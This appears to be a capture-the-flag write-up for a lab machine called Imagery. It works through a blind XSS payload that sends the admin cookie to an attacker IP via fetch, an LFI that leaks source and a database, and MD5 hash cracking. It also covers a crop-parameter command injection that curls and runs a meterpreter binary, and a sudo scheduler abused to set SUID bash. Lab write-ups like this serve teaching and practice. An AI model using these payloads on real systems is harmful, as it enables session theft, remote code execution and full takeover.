Imagery
Overview
Imagery is a Python web application with a bug reporting feature vulnerable to blind XSS. The admin's session cookie is exfiltrated, revealing a log download endpoint with an LFI vulnerability. Source code and a database are read via LFI, yielding a crackable MD5 hash. A visual transform feature with command injection provides a foothold. Post-exploitation finds an AES-encrypted backup whose password bruteforces, containing another crackable hash. A sudo-allowed charcol binary allows scheduling a cron-like task to SUID bash, granting root.
Recon
Nmap
sudo nmap -sC -sV -vv -oA tcp 10.129.242.164 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.242.164Port 8000 serves a Python web application. Image upload functionality appears normal on initial testing.
Blind XSS in Bug Report
A bug reporting form is discovered. Testing HTML injection reveals a blind XSS - the admin reviews submitted reports, triggering our payload in their browser:
Cookie Theft via XSS
Inject a payload that loads an external JavaScript file to exfiltrate the admin cookie:
POST /report_bug HTTP/1.1
Host: 10.129.242.164:8000
...
{"bugName":"title","bugDetails":"\"><img src=x onerror=\"var newSrc = document.createElement('script'); newSrc.setAttribute('src', 'http://10.10.15.235/js');document.head.appendChild(newSrc);\" />"}The js file served on port 80:
fetch("http://10.10.15.235/cookie="+btoa(document.cookie))A callback arrives with the admin's base64-encoded cookie:
Foothold
LFI in Log Download Endpoint
The admin dashboard has a log file download feature with a filename parameter in the URL:
The parameter is directly passed to a file read function - Local File Inclusion:
Source Code and Database Extraction
Read /proc/self/environ and /proc/self/cmdline to identify the application's working directory and Python path:
The db.json file contains MD5 hashes. Two are found - one cracks immediately:
5d9c1d507a3f76af1e5c97a3ad1eaa31
2c65c8d7bfbca32a3ed42596192384f6 → iambatmanhashcat -a 0 -m 0 md5 /mnt/hgfs/I/data/rockyou.txtCommand Injection via apply_visual_transform
Log in with the cracked credentials to access the apply_visual_transform endpoint:
The x crop parameter is vulnerable to OS command injection - it's passed unsanitised to an image processing binary:
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=tun0 lport=8443 -f elf -o ekg02Trigger the payload:
POST /apply_visual_transform HTTP/1.1
...
{"imageId":"...", "transformType":"crop","params":{"x":"0; curl 10.10.15.235/ekg02 -o /tmp/ek;chmod 0777 /tmp/ek; /tmp/ek&","y":0,"width":1920,"height":1081}}Meterpreter session received.
Lateral Movement
Linpeas finds an AES-encrypted backup at /var/backup/web_20250806_120723.zip.aes:
Bruteforce the AES password using:
https://github.com/Nabeelcn25/dpyAesCrypt.py
Unzip the decrypted archive. It contains another db.json with an MD5 hash for user mark:
Crack the hash: supersmash
From the Meterpreter session, su mark with the password. User flag accessible.
Privilege Escalation
charcol - Scheduled Task → SUID
Mark can run /usr/local/bin/charcol as root via sudo:
charcol is a custom task scheduling tool. It requires a password reset first:
sudo /usr/local/bin/charcol -RThen enter the charcol shell and schedule a cron-like task to set the SUID bit on /bin/bash:
sudo /usr/local/bin/charcol shell
auto add --schedule "* * * * *" --command "/bin/bash -c 'chmod u+s /bin/bash'" --name "RedCellLearning"Wait for the task to fire (within a minute). Then use bash -p to obtain a root shell with the preserved EUID:
bash -pAttack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | Web app enumeration | Bug report + image upload |
| Cookie theft | Blind XSS + JS exfiltration | Admin session cookie |
| LFI | Log download filename parameter | Source + DB extracted |
| Credential access | MD5 hash crack | iambatman login |
| Foothold | Command injection in crop param | Meterpreter as www-data |
| Lateral movement | AES backup bruteforce + hash crack | mark:supersmash |
| Privesc | sudo charcol → SUID bash | Root shell |